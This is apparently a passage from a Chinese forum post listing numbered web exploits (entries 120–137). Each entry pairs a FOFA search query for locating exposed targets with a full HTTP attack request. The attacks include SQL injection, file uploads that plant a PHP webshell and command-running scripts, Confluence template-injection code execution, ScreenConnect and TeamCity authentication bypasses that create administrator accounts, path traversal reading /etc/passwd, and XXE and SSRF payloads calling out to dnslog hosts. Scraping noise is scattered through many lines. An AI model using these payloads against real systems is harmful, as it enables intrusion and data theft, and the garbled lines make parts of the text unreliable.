: E) p) w5 R5 y, R2 G/ r7 b/ _: ~FOFA:title="Smart管理平台"; T8 N6 n* I) h: h1 g) O
先登录进入系统,默认账号密码为admin/admin
7 L' }# t, E& j* T- UPOST /sysmanage/sysmanageajax.php HTTP/1.119 w6 {( L9 @3 _) g2 u4 K
Host: x.x.x.x; R- Y/ Q2 h/ x- A
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee" i! M& {7 B7 F" O3 k* H# K  M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0) t2 B2 F/ `# h- p2 n( m
Accept: */*
$ c7 d; c( S# A/ v8 L8 t9 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 T: v( Z4 o7 B/ o# i6 P" K/ KAccept-Encoding: gzip, deflate
! v1 A1 K+ K1 ?- ^( i- C- C6 PContent-Type: application/x-www-form-urlencoded;; h$ s: M# w- V' k( ~
Content-Length: 109& b0 I) I& P/ w3 B
Origin: https://58.18.133.60:8443  Z- R( y5 A/ G9 n) @
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php1 Z' A/ R5 |8 J/ m8 f4 b2 ]
Sec-Fetch-Dest: empty
# Q) X6 {5 s! p* A- P* r& Q$ l9 RSec-Fetch-Mode: cors0 J- i8 r; o. x  X- y* y
Sec-Fetch-Site: same-origin. E1 q! L' }0 I  M# Z7 y3 y
X-Forwarded-For: 1.1.1.1
; F: Y6 J, c. b2 d/ `9 lX-Originating-Ip: 1.1.1.1" M0 S4 `8 R3 v- O7 d
X-Remote-Ip: 1.1.1.1# q4 g2 }2 z& M; c) ?
X-Remote-Addr: 1.1.1.1
0 g& r+ H- ?: E& Z4 j  i$ m& ]8 NTe: trailers
% k4 \" A: g( k4 S, X/ w" ~, Q: \Connection: close
$ ]( a+ J) M* I" i+ q1 `1 t: @% M) c0 t* d
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456" m* b: f2 e) u2 l; G; G
4 H7 y" ~4 J6 C- Z0 K

6 n  m; [' Z  S$ ?2 ^120. 北京百绰智能S40管理平台导入web.php任意文件上传
1 X1 q1 ?& p" f  D/ e% B1 RCVE-2024-1253
, }9 y+ v) G2 C8 o9 x5 eFOFA:title="Smart管理平台"7 h+ m2 G7 Q( ~9 K- d8 c
POST /useratte/web.php? HTTP/1.1) {- c0 O! b# d$ N
Host: ip:port
7 R3 ?- t. Q& N1 T8 D/ v9 D6 TCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db$ g9 q4 J' F- v9 [8 N; {+ l, L
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
+ `, @1 W; C3 d3 i0 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 t6 T* f, d) u7 t; I( l8 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ n7 v" W. j7 B$ s2 H7 zAccept-Encoding: gzip, deflate
- b. H6 C  g8 }2 U$ ]# ^6 J+ KContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328& g8 F5 F9 F) p+ F4 K0 Z
Content-Length: 597" S3 f' [" e1 f* ?; {
Origin: https://ip:port
2 h; Q3 s  R8 q  m' r; LReferer: https://ip:port/sysmanage/licence.php% P3 A  f+ Q' s; ^& s" k6 K
Upgrade-Insecure-Requests: 1
, v, M4 z, j8 p) i6 ]) a, ~' {2 G" `+ GSec-Fetch-Dest: document; L* @5 S7 G7 Z
Sec-Fetch-Mode: navigate, ?( e% d4 ]) c0 j' I8 I+ ]
Sec-Fetch-Site: same-origin
7 n9 `, e  B* T+ I9 {# M3 bSec-Fetch-User: ?1
! I' F( _& U& ^. i+ R" j" ATe: trailers
3 S+ ?; A0 |" x& y# |' U% cConnection: close
# ^: ?% x$ w' g# {& B
: \7 J, N8 g6 H% I$ Z- v8 @-----------------------------42328904123665875270630079328
; @3 ]( |5 {- I6 P9 I& ?- PContent-Disposition: form-data; name="file_upload"; filename="2.php"! o# U, K# M% w* \* {- |
Content-Type: application/octet-stream; P' g5 o- U1 p# {# K

1 q) c" I( \. H% R<?php phpinfo()?>
$ p/ D' E# H; C+ c3 U0 k-----------------------------42328904123665875270630079328
0 Q( a6 g$ X7 j0 H$ k% O1 V5 YContent-Disposition: form-data; name="id_type"
4 C0 y* q; r, K5 d
* A  b6 i4 o, Y) t$ Y( o1, E6 q9 @, c- E; c2 m
-----------------------------42328904123665875270630079328
7 i- K. f0 }8 gContent-Disposition: form-data; name="1_ck"9 C4 x- R5 W4 L! p1 p
/ c) b+ Q+ j2 {2 O/ M: ], z$ K/ A/ ~
1_radhttp+ T& ]/ u# \! m6 q
-----------------------------42328904123665875270630079328
( T6 m) E# N. _0 d2 u/ ZContent-Disposition: form-data; name="mode"& w/ D) i3 w! Q$ R& l5 J
6 V4 O1 {! w% Z; ~% s
import- W0 {1 B7 V) I+ O6 e* V
-----------------------------42328904123665875270630079328
% m3 k1 o: @. f: Z- p8 X! G- {2 W. N5 y# j4 E* \: I

' D4 q) L: h/ }. g- h文件路径/upload/2.php
) D3 s$ w  v0 [' G9 G" h, c- V' ^4 N. C% U) a
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
2 b: k6 z, ~7 N4 ~CVE-2024-1918% I, i- x  Z6 y8 e$ T8 e+ f
FOFA:title="Smart管理平台"1 `, b/ A' q9 z% J
POST /useratte/userattestation.php HTTP/1.1
2 Y) V; Z4 @; ~: b6 I' J- lHost: 192.168.40.130:8443
/ O& Q1 J+ g& g" O1 r, ]Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50- N  q7 a) ^( C0 k
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: b" M9 Y1 K: L  C) eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! \! V+ U% G9 S; x2 Q+ ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" b; ~( ?5 P. b1 P; y+ N# h
Accept-Encoding: gzip, deflate. S9 `/ H" o, ?9 r) p0 {2 T% A4 `
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
0 N; m' x9 p( I" ~Content-Length: 592" a5 m3 K4 e5 d8 C- ~
Origin: https://192.168.40.130:84435 Y* c8 m% ]. u: q8 r: @: q9 s
Upgrade-Insecure-Requests: 1
3 {' c# e  m/ V; `9 QSec-Fetch-Dest: document- c( a( Y9 ^# {' z' v
Sec-Fetch-Mode: navigate
4 w( b, b, t& P# D" @$ k7 [Sec-Fetch-Site: same-origin) `- _3 e2 P6 s9 U
Sec-Fetch-User: ?1" E' q5 Q3 n; }
Te: trailers
+ \! ?2 S3 @: p. c9 @2 ?+ T2 K* RConnection: close
. z. c" Z- x. X- O
4 _: O/ ~1 R7 ?9 |% `-----------------------------42328904123665875270630079328
, H. F$ l0 e$ Y2 a7 HContent-Disposition: form-data; name="web_img"; filename="1.php". w$ x6 ^+ L& P7 f* H
Content-Type: application/octet-stream
' q: I/ ?: K( q6 A5 H6 ^9 }8 q# v- H! g2 O5 j0 y; K; K* e1 |6 f2 G
<?php phpinfo();?>
1 d' q( O1 a! @% e! j' d- c% i, r-----------------------------423289041236658752706300793283 T0 C7 c. p0 Z; k
Content-Disposition: form-data; name="id_type"
/ `* F4 ^8 |5 t1 E/ r  I( W( P# L& V$ R7 L: h$ p
1
) e1 [& o& d; r4 X# p-----------------------------42328904123665875270630079328
4 R/ A+ ]: {+ ~. \, P' pContent-Disposition: form-data; name="1_ck"
* G' Z1 q( v# y+ b: v. V0 T+ c
* E$ u8 x" ~( }1_radhttp( r- H9 H+ R1 o  t$ a
-----------------------------423289041236658752706300793283 y; {% n5 j' _0 o6 {; C+ U8 ?
Content-Disposition: form-data; name="hidwel"
. S- j& C. k3 {# g3 g. W7 c6 R* R' d4 K# P
set
2 P% |6 h# j2 b* e$ ?: P/ R-----------------------------42328904123665875270630079328
1 v2 G" o9 z0 [" @; L5 f4 L' j& {) X7 f

6 _! h8 e6 V' Z1 m; Z# |boot/web/upload/weblogo/1.php
; x6 L0 w4 J8 G. v4 c0 ^# p
% J1 K  r7 G1 k! P7 J5 A& h" l5 q122. 北京百绰智能s200管理平台/importexport.php sql注入" L/ w" l' W3 P$ e0 o5 I3 ?; N
CVE-2024-27718FOFA:title="Smart管理平台"# }* O9 P& w, I; p6 n) E/ W/ w4 ?, n
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
+ M6 m0 b) z* ^9 F0 P8 o: {GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
( T1 k4 p9 J9 SHost: x.x.x.x
0 |1 c2 E1 ]! k  D4 K; a% bCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc03 _- k' \& N% X+ _5 m, e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
, E1 w* M1 ~. t, d4 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 s6 O: ]$ ^; p& O. n' M9 s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; t+ T' Q. [9 I) e( c" Q# s8 K9 O
Accept-Encoding: gzip, deflate, br4 r) h2 B. ?$ R4 a, x
Upgrade-Insecure-Requests: 1' C9 a- {. Z. v1 X2 l
Sec-Fetch-Dest: document
# u" r1 ~2 R- k9 i3 C( eSec-Fetch-Mode: navigate. Z3 l# [5 h+ P$ b& p. v* a9 W
Sec-Fetch-Site: none
6 |3 ^2 A$ z% m& }- s% K% FSec-Fetch-User: ?1
/ H6 N- n% D( k6 y. OTe: trailers
: y3 T! I3 F* H2 FConnection: close
6 p. G6 q) @. m0 k
3 ?5 |" Y8 K4 @, ~, Q" Q8 |/ \$ t
2 e6 G, S; p# O  H5 |123. Atlassian Confluence 模板注入代码执行
6 P7 R1 S3 x; [# M, {# f% pFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
/ b; ]$ k7 u) NPOST /template/aui/text-inline.vm HTTP/1.1
& d" H% i- c& |% b% U6 `; T/ f; mHost: localhost:8090
- P) f- }. ^# p* u5 mAccept-Encoding: gzip, deflate, br' O! o: [% A* q- X0 D5 S& c* }
Accept: */*
- n' m! @& f5 W; V' d2 sAccept-Language: en-US;q=0.9,en;q=0.8
' ^' B, c/ Y/ I3 M7 q# pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
1 R+ N* G$ P' Q! xConnection: close
5 Y& p8 _. o: {2 U  p' NContent-Type: application/x-www-form-urlencoded9 r0 N; e* S0 d6 k! b! b

5 Q. t& m  S7 blabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
8 l  t. z* O9 H) i+ q" P
- k$ i. h: S  J" g7 b) y& e1 @2 Y9 d$ z7 T3 |3 L
124. 湖南建研工程质量检测系统任意文件上传9 K# A8 {7 T; q
FOFA:body="/Content/Theme/Standard/webSite/login.css"
- Z! R" J9 W0 Y1 |: W& wPOST /Scripts/admintool?type=updatefile HTTP/1.1
) ]$ @, g# Y" j( p! B* ~9 lHost: 192.168.40.130:82824 F7 C# Q0 n; H% q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
9 _& k4 x2 @; j( A: I0 |Content-Length: 72# N/ c* O& X5 k( G# d9 {1 e# J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' h3 I- X0 N+ |$ I) H% T) v4 l
Accept-Encoding: gzip, deflate, br
% ^- g! |% z* }! qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% w: o# ]8 s2 H7 g5 k5 _# h( ]Connection: close
3 x* k1 M) E$ ~9 ~, |7 xContent-Type: application/x-www-form-urlencoded
- @1 a* ]5 B9 m' a& n# }
7 H- u7 c; p& r& U5 M2 A  kfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
) ^+ ~3 U5 O9 B1 \4 Y* z5 X3 U% [- w$ T) e% g) d
% r3 M; F, {. B: @% Y# q& R
http://192.168.40.130:8282/Scripts/abcgcg.aspx
- G- |+ J1 Q) f; ~  q  x/ J* V. C
125. ConnectWise ScreenConnect身份验证绕过
1 X8 g; o  k: ZCVE-2024-17098 ^2 ]" E- h, k+ g. Z* e4 {7 f. b
FOFA:icon_hash="-82958153"; S! v+ `2 ^: C( q4 Y
https://github.com/watchtowrlabs ... bypass-add-user-poc
8 G9 H0 R  r5 `( `! X. r/ z+ T8 f9 P# J

3 v8 O0 o8 R' U, L% W使用方法
* b  M& P7 ~& z! h" O8 l' c" E2 Spython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!% y5 I- t2 d  n& p- H4 w3 s
) V2 Z; F6 e5 @1 D
# o4 g( J$ ?) s9 V& X
创建好用户后直接登录后台,可以执行系统命令。
1 U) s( g  |( {  B8 N  r
3 p* {" R& P: ~( {- `7 r, H$ m% \; H126. Aiohttp 路径遍历$ e4 B3 w1 G, v; y& }1 d
FOFA:title=="ComfyUI"
& O  g; u7 l2 k" VGET /static/../../../../../etc/passwd HTTP/1.1% t! A; _) E3 Z
Host: x.x.x.x
# `$ e! s& M/ y* J$ v3 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36# M5 M; x: w, Z+ W' O2 w
Connection: close, w; B# x- i* {% v
Accept: */*
6 y. |! b5 d9 S5 n1 lAccept-Language: en
! N% s6 ]5 U* }! K! V( d! dAccept-Encoding: gzip, `, z- D5 @7 x

7 y1 q. R+ p) k9 _! u6 f, t5 S/ M! a. d( N9 [0 t7 f( F( n
127. 广联达Linkworks DataExchange.ashx XXE' I" l3 o) H; p9 j
FOFA:body="Services/Identification/login.ashx"
4 i- x4 m/ v, I, {POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
" m$ J% k/ \! K- R/ ^& SHost: 192.168.40.130:8888
/ e  [: N+ w* t* ~  dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
% J, M7 f- Z  }4 Y5 ZContent-Length: 415
& t, Z5 `/ Q$ Q& sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ B5 [( N' [/ X. W9 }  ~Accept-Encoding: gzip, deflate4 j2 b% P% _! d" d- U3 a9 |
Accept-Language: zh-CN,zh;q=0.9; Y: N. ?9 n# Y+ Q
Connection: close* O3 h$ D7 f3 W7 q! f& r
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0" M) J0 Y) Y. d7 U; |
Purpose: prefetch
# w1 c% k. s/ v5 i0 ?Sec-Purpose: prefetch;prerender5 ^' T" g' ?! f( c0 X4 Q% ?* S& y7 u! p# ]
, X6 |$ U5 i4 L2 q8 G" b5 |
------WebKitFormBoundaryJGgV5l5ta05yAIe07 S# j- }5 i: A  M
Content-Disposition: form-data;name="SystemName"
5 W) I% a% o& O; U4 v* L2 |2 x3 Z2 s0 c/ O4 [
BIM  S7 |. X: h, j) P  S1 I3 d
------WebKitFormBoundaryJGgV5l5ta05yAIe0, e& d% i7 z& E. t
Content-Disposition: form-data;name="Params"
$ }9 ?5 h7 t* jContent-Type: text/plain  s# x4 z- x6 L% h! n
* ~4 }9 G0 g# _+ ~/ _2 Y  L
<?xml version="1.0" encoding="UTF-8"?>6 e, t! I) S5 i1 G; G% \/ I
<!DOCTYPE test [
" X5 M  g# S) ]6 y. a: j<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">( I0 J1 y9 B" _
]8 H% T" ~0 o' n  J2 l& v" o$ `
>
) _2 Y; Z2 P. A- g' Y<test>&t;</test>
( ~; l; y4 F8 F" b------WebKitFormBoundaryJGgV5l5ta05yAIe0--
# }# m" V6 |( R  p
7 |8 W4 h4 m3 ?
6 [. h3 l: F$ }2 Z" q  j4 @
- G2 c* q" }; b6 b% I$ F( f+ g128. Adobe ColdFusion 反序列化
0 f( X! B9 P, u1 |" z- T( HCVE-2023-38203
) z+ h3 X+ h+ i4 R9 S& y) B$ HAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
! Y& @' h6 ^" U5 v1 a0 T* G) ]5 yFOFA:app="Adobe-ColdFusion"" \2 ~; c( F: B- N* L% A. ^
PAYLOAD
9 m; p9 h5 _% i& d  [* _6 Y) J/ u# f6 P! y* P' b! e
129. Adobe ColdFusion 任意文件读取
( r: C* e: e$ DCVE-2024-20767: }# W7 l; h/ O* p. u% V
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"$ K9 Q3 }; d. D/ X
第一步,获取uuid
7 s' u3 Y2 w+ c3 J3 V: hGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
# m: U- d2 J9 G) m5 t' oHost: x.x.x.x% c  Z# k: V  T1 Z' q# Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
, k; W8 \6 W, t) t2 |' _Accept: */*8 b& P% b1 F, ]1 N! j+ _3 ?4 V
Accept-Encoding: gzip, deflate3 [# t& W/ S2 B7 b* s+ S
Connection: close. I$ x+ K/ H4 {/ c* G, s0 |) C

5 `# h$ J; b& r2 [4 Q* r
' o- e$ s; c' n! Q4 J第二步,读取/etc/passwd文件
6 G' P7 H+ E5 D5 EGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1' `* a3 ]3 {# d) k, X# J/ p' z
Host: x.x.x.x$ S. n5 M3 }! s7 n: K3 n- ^$ v5 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 f- W" K) N/ v; p
Accept: */*: \. F7 n' }. D) K) ^
Accept-Encoding: gzip, deflate' C( m5 m$ F5 @9 p
Connection: close
6 O4 s  U  a% J; b7 L# n5 Juuid: 85f60018-a654-4410-a783-f81cbd5000b9% v3 ?/ L6 W1 \$ v

8 |/ \$ A* @3 f# n( }
+ T1 D4 {' s) X130. Laykefu客服系统任意文件上传
1 }/ m6 s% e9 E* W- a, v: [- oFOFA:icon_hash="-334624619"8 k; x: b+ v: C9 C) l
POST /admin/users/upavatar.html HTTP/1.1% w, s! c' T% G7 {" F/ {, b' L
Host: 127.0.0.1/ x* n: g0 W" z) M0 g/ _
Accept: application/json, text/javascript, */*; q=0.019 t8 b( J2 O( r, l, Q( n9 C& U
X-Requested-With: XMLHttpRequest
' Q3 Y3 k1 X" BUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
( r& s% S4 g, c, i0 yContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR' K% n) k. z  p& p
Accept-Encoding: gzip, deflate
- e+ v  o% ^$ P& w2 h- tAccept-Language: zh-CN,zh;q=0.9
6 j: |# y, i6 b/ d6 T4 r# hCookie: user_name=1; user_id=3: j! d% Z4 d1 v0 ?' W% H
Connection: close, ^7 t2 }7 b8 a3 Y$ \  H# V
0 u" L# y( B1 K9 W
------WebKitFormBoundary3OCVBiwBVsNuB2kR
8 C" r$ V! \5 H$ n, c# pContent-Disposition: form-data; name="file"; filename="1.php"
( q( G# d7 _3 s" n8 j& G8 k& AContent-Type: image/png% w8 o+ }  l6 L
# `* r8 m8 {# F% z3 S# }
<?php phpinfo();@eval($_POST['sec']);?>: N# k5 Q! D4 |2 u: M
------WebKitFormBoundary3OCVBiwBVsNuB2kR--8 a" K7 b: N2 F; x$ O9 V7 A, ?

2 y7 z4 I4 `4 p5 G" K3 q& h* f3 e( ]$ a, Z" d- M- Y
131. Mini-Tmall <=20231017 SQL注入
4 x- }/ z* I3 D& F  p. H* PFOFA:icon_hash="-2087517259"
* c) T* B5 z- n# w8 a- ~后台地址:http://localhost:8080/tmall/admin" ^2 G* z4 Z; _$ J. _
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
* Z+ ?5 z4 [8 E# A
% `2 Q) s  f8 P9 S0 J132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
; t8 g/ `6 b3 p- \CVE-2024-27198
( h2 {  E; w% R5 W1 DFOFA:body="Log in to TeamCity"5 G" |: N* ~, z
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
# e# q9 P5 P+ G% x4 l9 g/ T6 OHost: 192.168.40.130:8111
3 g2 G4 B. f- P, lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, d) V. ^* H* H$ T
Accept: */*$ W8 H6 D; `2 Y6 U; g5 v4 M
Content-Type: application/json
' e4 j  i8 }- ^Accept-Encoding: gzip, deflate: P1 I; r# y' s1 U' M
( j3 e4 I6 [: s, t7 {' u/ o$ I
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
7 @$ g7 f+ I, _5 i
5 e$ K/ j3 k5 l
2 v- q8 h( p# HCVE-2024-27199
: H0 F* j# n3 e0 `8 H/res/../admin/diagnostic.jsp0 r( c- C, A! Q: d
/.well-known/acme-challenge/../../admin/diagnostic.jsp
3 N' R: k7 f0 ?" L- Z/update/../admin/diagnostic.jsp
$ I, i7 o* ?/ ]1 r1 E. `7 f, r
& L( T9 L' ?; {
! r! C4 I* d) r) w3 V( b+ WCVE-2024-27198-RCE.py
# x# p) ~' m) ^2 f- K
* r! X# {. m- C! ]" D+ x' O, |133. H5 云商城 file.php 文件上传- T3 `9 @! `6 E/ E6 Q, t: q; f
FOFA:body="/public/qbsp.php"- a% b' N4 X8 a+ p6 {
POST /admin/commodtiy/file.php?upload=1 HTTP/1.15 g- z& [: q1 q% p& n( D* Y& M
Host: your-ip: w) V- o' u% n3 x" \3 \3 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 X$ O2 \% W7 G  e( o( [! j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx6 K; [' i( P3 [* t' q/ K3 w
. x: G! U& P2 J9 p+ K1 [
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
( F; f* q! o6 U' E$ y( e2 WContent-Disposition: form-data; name="file"; filename="rce.php"3 Z5 L0 d3 j3 @8 a8 P5 D2 t
Content-Type: application/octet-stream8 G6 _- S- n. t  @! Q
$ `+ Q( s  `! p- c9 _( s: [% w
<?php system("cat /etc/passwd");unlink(__FILE__);?>) c$ i. C# u, w/ F
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
; l- h/ L/ d2 ]! U* _$ }! ^$ X3 I/ v6 J9 o, I7 h8 A# \6 K, K

& o4 ]" F- z% u3 L( t. J
1 D& ^' ^$ e$ Y* C0 p( `! x+ U, Y3 v134. 网康NS-ASG应用安全网关index.php sql注入/ e7 `  v) l+ N& d, u0 k) {
CVE-2024-2330
+ p$ }- x/ u6 Z! d& ?. CNetentsec NS-ASG Application Security Gateway 6.3版本: ^3 }  _9 n6 e7 ]' i
FOFA:app="网康科技-NS-ASG安全网关", c0 K, ^! `2 M1 ]
POST /protocol/index.php HTTP/1.1
& K" s5 ~1 c& `Host: x.x.x.x
; J4 \# p$ g$ X/ I6 S+ NCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
, i7 K+ _: h4 O# \- f7 n  G0 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0* A/ h* W" `! T" @1 w  b; q' \
Accept: */*
& n6 S+ |6 m1 P9 O' j: C" ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ g4 j& s9 d6 H" ^- GAccept-Encoding: gzip, deflate& c' F2 W9 C, s4 h
Sec-Fetch-Dest: empty
4 z2 ^! X$ e3 j" S# b& y0 QSec-Fetch-Mode: cors2 L# ~) d% \5 b7 N6 i) w( e& f/ Z6 G. P
Sec-Fetch-Site: same-origin/ _$ H6 a1 }( i& j' ~- b7 ^1 Q
Te: trailers2 S: E1 I; ]3 ]5 ]
Connection: close8 G$ w! ?' z3 [: Y0 D
Content-Type: application/x-www-form-urlencoded" W/ g( N- N& [- T# f
Content-Length: 263; D4 P/ S7 Z6 s  c

9 Y0 V' D* i6 U/ `0 G0 e2 Yjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}8 a/ Y9 V' m/ h: v

$ e% N( ~* l0 P' U
* h: v$ s. d% T2 n7 ]- a- v: D8 I/ K135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
/ c7 [) g; Z/ B2 ?CVE-2024-20220 H( {1 r9 H6 ]/ J
Netentsec NS-ASG Application Security Gateway 6.3版本* o! f( j) b9 ^7 t: }0 [
FOFA:app="网康科技-NS-ASG安全网关"
$ j7 V# }4 y+ w* C: x4 H4 M/ B' {GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1/ _% ]) |" Y/ t- j1 o
Host: x.x.x.x
  q; @1 G8 r9 K1 _2 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( \& z7 w$ E" p, pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ ^% ^5 s. F! P6 t3 SAccept-Encoding: gzip, deflate* ^: Q4 Y2 J( j
Accept-Language: zh-CN,zh;q=0.91 C$ j" O& l/ n+ p$ ?+ [$ h
Connection: close6 d5 q' T; ?8 i. Y, ]

1 K( _3 k  B4 O8 W
/ W+ h( u0 c  ~136. NextChat cors SSRF" W+ I8 \- g# g; A  S
CVE-2023-49785
- l6 ~: c/ i$ }, n5 TFOFA:title="NextChat"5 A2 @" s. r! ~/ z8 O
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1$ u  U8 x1 p& h
Host: x.x.x.x:10000, d; J) n5 v% e$ N6 x# _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
3 R' Y: }( ^5 F5 ^; _Connection: close
) v$ J! d2 N* p$ {Accept: */*
$ D: V" I# x- x# WAccept-Language: en0 `# B! m( F6 X1 g
Accept-Encoding: gzip/ E/ b1 \' J, H

8 V0 y* _6 z- l5 g5 r' V$ ^4 C  h
+ N: P( d) y, }! U137. 福建科立迅通信指挥调度平台down_file.php sql注入- H9 v) o8 [% |: t# {
CVE-2024-2620* |8 e* o0 f# m, M0 y$ M
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
! @1 T, B, G: K: _: Y. ~- K  GGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
$ t* y( Q) e- q9 }Host: x.x.x.x
" P% t$ _# a8 Z/ B) cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) U& a# {8 Y+ SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% w, u3 D5 W5 g/ C" z' Y( ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 i$ Y2 D) }" [! X+ r
Accept-Encoding: gzip, deflate, br
" z, {& N: [) G; GConnection: close
